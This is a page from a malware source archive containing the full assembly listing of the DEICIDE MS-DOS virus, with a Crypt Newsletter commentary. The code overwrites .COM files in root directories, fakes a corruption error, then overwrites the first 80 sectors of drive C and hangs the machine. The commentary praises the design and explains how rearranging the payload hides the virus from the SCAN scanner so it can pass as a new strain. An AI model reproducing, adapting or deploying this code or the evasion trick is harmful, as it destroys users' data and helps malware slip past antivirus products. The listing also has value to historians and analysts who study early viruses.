MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.deicide.asm

219 lines
9.2 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;***************************************************************************
; Source code of the DEICIDE Virus, original author: Glen Benton
; Assemble with A86 - Sanitized, English-ized and spruced up for inclusion
; in Crypt Newsletter #7. The Crypt reader will also notice the
; DEICIDE listing has NO declarative red tape - no org's, no assume
; cs,ds,es stuff, no start/ends pairs or proc labels. For the average
; reader, this means TASM and MASM will choke if you try to get them to
; assemble this as is. A86 doesn't need it, as Isaacson is fond of saying,
; and this listing can be assembled directly to a .COMfile
; without the need of a linker.
;
; DEICIDE virus is a kamikaze overwriting .COM infector, with a length
; of 666 bytes in its original state. With A86, you get 665 bytes, which, we
; assume ruins, the 'aesthetics' of things just a bit. (Try adding a NOP
; to the listing if this bugs you too much.) Anyway, on call DEICIDE
; jumps right to the root directory where it looks for a any .COM file
; except COMMAND.COM to infect.
;
; If all files are infected, and DEICIDE is not on the C drive it attempts to
; ruin it anyway. If all files in the root on C are infected, the fixed disk
; is destroyed, a message displayed and the computer hung.
; If a program is successfully overwritten, DEICIDE exits to DOS
; after displaying 'File corruption error.' If DEICIDE is trapped on
; a diskette that is write-protected, it will generate noxious 'Abort,
; Retry, Ignore, Fail' messages.
;
; You can work with DEICIDE quite easily by commenting out the destructive
; sequence and reassembling. Then it will merely mess up .COM's in
; your root directory. If you forget that you're using NDOS or 4DOS, DEICIDE
; will promptly foul your command processor and the operating system
; won't load properly when you reboot. In an interesting side note,
; removing the destructive payload of DEICIDE causes SCAN to lose sight of
; DEICIDE. (There's a simple poor man's method to a 'new' strain. Fool
; your friends who think you've written a virus from scratch.)
; The DEBUG script of DEICIDE has the destructive payload "rearranged" and
; is not, strictly speaking, identical to this listing. This has made
; that copy of DEICIDE (referred to in the scriptfile as DEICIDE2)
; functionally similar to the original, but
; still invisible to SCAN v85b and a number of other commercial products.
; The lesson to be learned here is that software developers shouldn't choose
; generic disk overwriting payloads as signatures for their scanners.
;
; I must confess I'm fascinated by the mind that went into creating DEICIDE.
; Even in 1990, the DEICIDE was more of a 'hard disk bomb' than a virus.
; Think a moment. How many files are in your root directory? How long before
; this sucker activated and spoiled your afternoon? Once? Twice? In
; any case, it still is an easily understood piece of code, enjoying its
; own unique charm. Enjoy looking at DEICIDE. Your virus pal, URNST KOUCH.
;***************************************************************************
Start_Prog: jmp short Start_Virus
nop
Message db 0Dh,0Ah,'DEICIDE!'
db 0Dh,0Ah
db 0Dh,0Ah,'Glenn (666) says : BYE BYE HARDDISK!!'
db 0Dh,0Ah
db 0Dh,0Ah,'Next time be carufull with illegal stuff......$'
Start_Virus: mov ah,19h ; Get actual drive
int 21h
db 0A2h ; Mov [EA],al
dw offset Infect_Drive
db 0A2h ; A86 assembles this differently
dw offset Actual_Drive ; so put the original code here
mov ah,47h ; Get actual directory
mov dl,0
mov si,offset Actual_Dir
int 21h
mov ah,1Ah ; stash DTA in safe place
mov dx,offset New_DTA
int 21h
Infect_Next: mov ah,3Bh ; DOS chdir function, go to root dir
mov dx,offset Root_Dir
int 21h
mov ah,4Eh ; Search first .COM file
mov cx,0
mov dx,offset Search_Path ; using file mask
int 21h
Check_Command: mov al,'D' ; Check if 7th char is a 'D' (To prevent
cmp [New_DTA+24h],al ; infecting COMMAND.COM, causing
jnz Check_Infect ; noticeable boot failure)
jmp short Search_Next
nop
Check_Infect: mov ah,3Dh ; Open found file with write access
mov al,2
mov dx,offset New_DTA+1Eh
int 21h
mov File_Handle,ax ; Save handle
mov bx,ax
mov ah,57h ; Get date/time of file
mov al,0 ; why, for Heaven's sake?
int 21h
mov File_Date,dx
mov File_Time,cx
call Go_Beg_File ; Go to beginning of file
mov ah,3Fh ; Read first 2 bytes
mov cx,2
mov dx,offset Read_Buf ; into a comparison buffer
int 21h
mov al,byte ptr [Read_Buf+1] ; now, take a look at the
cmp al,offset Start_Virus-102h ; buffer and the start of
jnz Infect ; DEICIDE. Is it the
; jump? If not, infect file
mov ah,3Eh ; Already infected, so close file
int 21h
Search_Next: mov ah,4Fh ; Search next file function
int 21h
jnc Check_Command ; No error - try this file
mov al,Infect_Drive ; Skip to next drive,
cmp al,0
jnz No_A_Drive
inc al
No_A_Drive: inc al
cmp al,3 ; Is the drive C:?
jnz No_Destroy ;
; if it is and haven't been
; able to infect
mov al,2 ; Overwrite first 80 sectors,
mov bx,0 ; BUMMER!
mov cx,50h ; BUMMER!
mov dx,0 ; BUMMER!
int 26h ; BUMMER!
mov ah,9 ; Show silly message
mov dx,offset Message
int 21h
Lock_System: jmp short Lock_System ; lock up the system so the poor fool
; has to start reloading right away
No_Destroy: mov dl,al ; New actual drive
mov ah,0Eh
mov Infect_Drive,dl ; Save drive number.
int 21h
jmp Infect_Next
Infect: call Go_Beg_File ;call seek routine
mov ah,40h ; Write DEICIDE to the file
mov cx,offset End_Virus-100h ;right over the top, starting
mov dx,100h ; at the beginning, thus messing
int 21h ; up everything
mov ah,57h ; Restore date/time of file
mov al,1 ; why, for God's sake? You
mov cx,File_Time ; think no one will notice
mov dx,File_Date ; file is destroyed?
int 21h
mov ah,3Eh ; Close file, let's be neat
int 21h
mov dl,byte ptr [Actual_Drive] ; Back to original drive
mov ah,0Eh
int 21h
mov ah,3Bh ; And original dir
mov dx,offset Actual_Dir
int 21h
mov ah,9 ; Show 'File corruption error.'
mov dx,offset Quit_Message ; when destroyed, infected
int 21h ; program misfires and DEICIDE
; executes so user may be placated
int 20h ; Exit back to DOS
Go_Beg_File: mov ah,42h ; Procedure: seek to start of file
mov al,0
mov cx,0
mov dx,0
int 21h
ret
File_Date dw (?)
File_Time dw (?)
File_Handle dw (?)
Infect_Drive db (?)
Root_Dir db '\',0
Search_Path db '*.COM',0
Read_Buf db 2 dup (?)
Actual_Drive db (?)
Quit_Message db 'File corruption error.',0Dh,0Ah,'$'
New_DTA db 2Bh dup (?)
Actual_Dir db 40h dup (?)
db 'This experimental virus was written by Glenn Benton to '
db 'see if I can make a virus while learning machinecode for '
db '2,5 months. (C) 10-23-1990 by Glenn. I keep on going '
db 'making virusses.'
End_Virus: